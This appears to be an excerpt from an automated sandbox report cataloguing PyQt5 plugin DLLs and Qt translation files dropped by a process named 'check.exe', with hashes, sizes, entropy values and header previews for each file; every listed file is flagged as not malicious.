SSDEEP:	768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
MD5:	A9ABD4329CA364D4F430EDDCB471BE59
SHA1:	C00A629419509929507A05AEBB706562C837E337
SHA-256:	1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
SHA-512:	004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qjpeg.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	421360
Entropy (8bit):	5.7491063936821405
Encrypted:	false
SSDEEP:	6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
MD5:	16ABCCEB70BA20E73858E8F1912C05CD
SHA1:	4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
SHA-256:	FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
SHA-512:	3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..\|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qsvg.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	32240
Entropy (8bit):	5.978149408776758
Encrypted:	false
SSDEEP:	768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
MD5:	C0DE135782FA0235A0EA8E97898EAF2A
SHA1:	FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
SHA-256:	B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
SHA-512:	7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qtga.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31728
Entropy (8bit):	5.865766652452823
Encrypted:	false
SSDEEP:	768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
MD5:	A913276FA25D2E6FD999940454C23093
SHA1:	785B7BC7110218EC0E659C0E5ACE9520AA451615
SHA-256:	5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
SHA-512:	CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qtiff.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	390128
Entropy (8bit):	5.724665470266677
Encrypted:	false
SSDEEP:	6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
MD5:	9C0ACF12D3D25384868DCD81C787F382
SHA1:	C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
SHA-256:	825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
SHA-512:	45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qwbmp.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30192
Entropy (8bit):	5.938644231596902
Encrypted:	false
SSDEEP:	768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
MD5:	68919381E3C64E956D05863339F5C68C
SHA1:	CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
SHA-256:	0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
SHA-512:	6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qwebp.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	510448
Entropy (8bit):	6.605517748735854
Encrypted:	false
SSDEEP:	12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
MD5:	308E4565C3C5646F9ABD77885B07358E
SHA1:	71CB8047A9EF0CDB3EE27428726CACD063BB95B7
SHA-256:	6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
SHA-512:	FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qminimal.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	844784
Entropy (8bit):	6.625808732261156
Encrypted:	false
SSDEEP:	12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
MD5:	2F6D88F8EC3047DEAF174002228219AB
SHA1:	EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
SHA-256:	05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
SHA-512:	0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qoffscreen.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	754672
Entropy (8bit):	6.6323155845799695
Encrypted:	false
SSDEEP:	12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
MD5:	6407499918557594916C6AB1FFEF1E99
SHA1:	5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
SHA-256:	54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
SHA-512:	8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.\|.JQ..KT..K...K.\|.Js..K.\|.JS..K.\|.JU..K.\|[KU..K.\|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qwebgl.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	482288
Entropy (8bit):	6.152380961313931
Encrypted:	false
SSDEEP:	6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
MD5:	1EDCB08C16D30516483A4CBB7D81E062
SHA1:	4760915F1B90194760100304B8469A3B2E97E2BC
SHA-256:	9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
SHA-512:	0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qwindows.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1477104
Entropy (8bit):	6.575113537540671
Encrypted:	false
SSDEEP:	24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
MD5:	4931FCD0E86C4D4F83128DC74E01EAAD
SHA1:	AC1D0242D36896D4DDA53B95812F11692E87D8DF
SHA-256:	3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
SHA-512:	0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68592
Entropy (8bit):	6.125954940500008
Encrypted:	false
SSDEEP:	1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
MD5:	F66F6E9EDA956F72E3BB113407035E61
SHA1:	97328524DA8E82F5F92878F1C0421B38ECEC1E6C
SHA-256:	E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
SHA-512:	7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	144368
Entropy (8bit):	6.294675868932723
Encrypted:	false
SSDEEP:	3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
MD5:	53A85F51054B7D58D8AD7C36975ACB96
SHA1:	893A757CA01472A96FB913D436AA9F8CFB2A297F
SHA-256:	D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
SHA-512:	35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_ar.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	130
Entropy (8bit):	4.024232093209084
Encrypted:	false
SSDEEP:	3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
MD5:	8FF05B56C0995F90A80B7064AA6E915C
SHA1:	D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
SHA-256:	A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
SHA-512:	5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_bg.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6813848812976975
Encrypted:	false
SSDEEP:	3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
MD5:	466EED6C184D2055488D4C5EA9AE5F20
SHA1:	8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
SHA-256:	9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
SHA-512:	D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_ca.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.631479835393124
Encrypted:	false
SSDEEP:	3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
MD5:	6FBA66FE449866B478A2EBA66A724A02
SHA1:	EBEF6ED8460218CE8DF735659A8CBCD693600AC6
SHA-256:	171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
SHA-512:	2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_cs.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	157
Entropy (8bit):	3.7483537099309427
Encrypted:	false
SSDEEP:	3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
MD5:	D033053C03C3ECFA2AA926E0E674F67F
SHA1:	B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
SHA-256:	3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
SHA-512:	2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_da.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6174817344122334
Encrypted:	false
SSDEEP:	3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
MD5:	E6A683F4A0883B5B0C7D30B847EF208C
SHA1:	FF2440DBBFE04AD86C6F285426AAFD49A895B128
SHA-256:	B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
SHA-512:	D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_de.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6174817344122334
Encrypted:	false
SSDEEP:	3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
MD5:	06168E1261BF72F49F94927723B2E1EB
SHA1:	DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
SHA-256:	5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
SHA-512:	AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_en.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:j2wZC4n:CwZ
MD5:	BCEBCF42735C6849BDECBB77451021DD
SHA1:	4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
SHA-256:	9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
SHA-512:	F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_es.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6070658648473097
Encrypted:	false
SSDEEP:	3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
MD5:	EE47DFADBA4414FDC051C5CFBE71DDC1
SHA1:	DE650E96A9C130D35F8A498202773EF7FC875D27
SHA-256:	E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
SHA-512:	8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_fa.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	293121
Entropy (8bit):	5.272179385890926
Encrypted:	false
SSDEEP:	3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
MD5:	F9C3624197ACB30A9E6CC799BB65BED6
SHA1:	D715EAE24387DE15588F68C92991A93FAFB5EEAB
SHA-256:	B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
SHA-512:	199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
Malicious:	false
Reputation:	unknown
